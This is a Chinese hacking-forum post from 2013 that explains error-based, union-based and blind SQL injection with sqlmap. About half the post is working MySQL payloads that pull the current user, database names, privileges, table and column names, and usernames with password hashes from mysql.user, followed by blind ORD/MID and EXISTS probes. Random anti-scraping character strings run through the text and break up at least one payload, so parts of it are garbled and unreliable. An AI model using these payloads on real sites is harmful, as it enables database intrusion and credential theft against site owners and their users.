找回密码
 立即注册
查看: 2850|回复: 0
打印 上一主题 下一主题

sqlmap高级注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-16 20:31:26 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
放假第一天,本应该好好放松一下,可是还是想着把文章写完先。。。- p% i* P9 j" ]- W7 Q; ]: o

: v3 N& x# x8 Q' Y这次的主题是高级注入,坛子里也讲到了一些,不过本文旨在给大家一个更深刻的概念和全面的理解,下面看看我自己列的一个表* i9 V: F! Y- s8 B" l' ?/ m) T
3 ]6 N+ b$ u! B
分类标准        分类        备注$ B! E: J1 N2 i4 y% D9 z
按字段类型        整型注入,字符型注入       
  ^9 z  Y9 T* c( _按出现的位置        get注入,post注入,cookie注入,http header注入        5 S: F# J- i+ y* c3 e* R9 D2 s
然而高级注入是这样的
+ A7 E) V  H, A- L6 `- Z* ~
3 \9 ?9 w, g$ \& `* K高级注入分类        条件0 _1 a$ o2 J, d- k# u9 Y9 I$ Q
error-based sql        数据库的错误回显可以返回,存在数据库,表结构
$ M" u: v  r; R, E2 M) Y* a2 Lunion-based sql        能够使用union,存在数据库,表结构) B, |1 Z7 s3 F
blind sql        存在注入1 S2 u! M2 ]/ O( B+ D
我们暂且不考虑waf等的影响,只从原理上学习。通过上面我们不难发现,三种高级注入选择的顺序应该是eub(第一个字母,后面为了方便我都这样表示了 ),实际上,e是不需要知道字段数的,u需要知道字段数,e之所以在前我觉得主要是因为这个,因为在其他方面它们没有本质的区别,它们都需要知道数据库以及表的结构,这样才能构造出相应的语句,当然,能e一般能u(没过滤union等),反过来却很不一定,因为一般会有自定义的错误提醒。如果没有结构,那么就回到了最悲剧,最麻烦的b了,猜。。。当然可能没有结果,但是如果只是不能使用u,有结构,b还是能出结果的,只是苦逼点而已。。。
; p7 w) W2 m/ t0 a: w& ~
  H. P/ c: i/ @+ N0 W3 d/ u好了,说了这么多,该上神器sqlmap了,最近坛子里貌似很火
& P. W: r7 p7 m# K7 x/ ]6 @; y
& e( m# s2 F0 N" [$ _, u附件分别以mysql和mssql为例子,提醒:sqlmap中使用-v 3可以查看每个请求的payload。
7 h1 S& z# I0 G. t# M
) |: T8 [6 J- h8 g9 G$ ~这里用mysql说明& Y7 N% G1 F2 B" G
: e% A+ X- d; x$ f- c, M/ q
e注入坛子里很多了,请看戳我或者再戳我' x$ {) t& N$ X  ~$ l% G
" K$ B6 p. o: i# y
u注入其实也很多了,这里就大概帖上一些重要语句吧,附件上结合例子都有的- C" m' w4 l' l0 K
) c/ g# q; P: f2 s( R8 `1 O8 B; Z
获取当前数据库用户名1 @' f3 @0 |  j* I( M. J& D

1 c% H  T  A5 V# r) [UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C
& ~% a7 s  r' N( \" hAST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL
& i/ f' V# k/ `5 ?4 c) kL, NULL#, G" w1 n/ _& T9 K
注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。4 h: n2 ]* y6 X2 M0 j

- Q6 L2 d" `& O+ z获取数据库名) H5 i7 |1 Z, N, u
# @0 B; d1 X# P+ w3 v1 X! @- V" T9 [
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#. A* h. x4 [3 p/ D& O  _$ T+ B
获取所有用户名
& p5 U$ M* f. f& {! b' q+ y! P
1 d) m" i$ U6 FUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#
# I1 l0 Y+ V* R* b. x) _4 i查看当前用户权限; R. q+ J: T0 z

3 o* b3 D# D" j! o6 I4 NUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES## J7 P5 e7 t) J- @+ A
尝试获取密码,当然需要有能读mysql数据库的权限0 a$ O7 N( B$ I; k7 H5 [- J

  I! ^2 E) I0 _/ fUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user#/ w$ l& l" R+ U
获取表名,limit什么的自己搞啦/ {# T; Q! ?; G2 w( {" o

! g  k9 |1 Y$ x8 D; K* sUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#
8 a( j1 N" W7 j  Y! d( D获取字段名及其类型' s+ O- \% {3 u8 r. e! s1 G
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)#
* s. x* C. f; t* d& ?8 j
3 `6 C2 Y  X8 u  x1 g* {b注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。7 S+ v' a2 e/ S- F

( p# l* |6 q5 z% {如:
) `5 i! {) {6 r1 L4 Q获取当前用户名
0 P* u3 @8 F# \4 P6 q( d" u
0 C7 y/ ]  y3 x" g. ZAND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 116
* C4 I' p# A, q4 w获取当前数据库- ]% ~) V+ y$ U
0 N/ u3 H5 e( z$ r$ m( b
AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 106
9 z$ M& X# u# |* o获取表名0 G4 q( m; _1 q% _
4 }7 P- P# B! f5 A+ h9 u- ?
AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 51" i0 F' N4 D+ g: w. M+ f
获取字段名及其类型和爆内容就不说了,改改上面的就可以了。) M: Q8 L1 ~; p7 m8 {% i) d
回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。
4 {* x& t& i/ k: u# M6 p- i爆表
% Q! e/ G5 @. v+ c- `; p! Y % x# w/ U3 P* J  `
AND EXISTS(select * from table). [4 s! F  i9 t' u+ k& r, M
爆字段; Q( R4 m. D9 h

8 P' x( l* J7 dAND EXISTS(select pwd from table)2 s; j3 N+ ~) O+ ^4 |9 \5 R5 q
盲注的变化就比较多了,由于篇幅,只是举个例子而已。; K& ^; T7 {) y6 X) @
- m5 m. w  O5 }, f; P" G
本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。
$ q% |, f4 f4 N
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表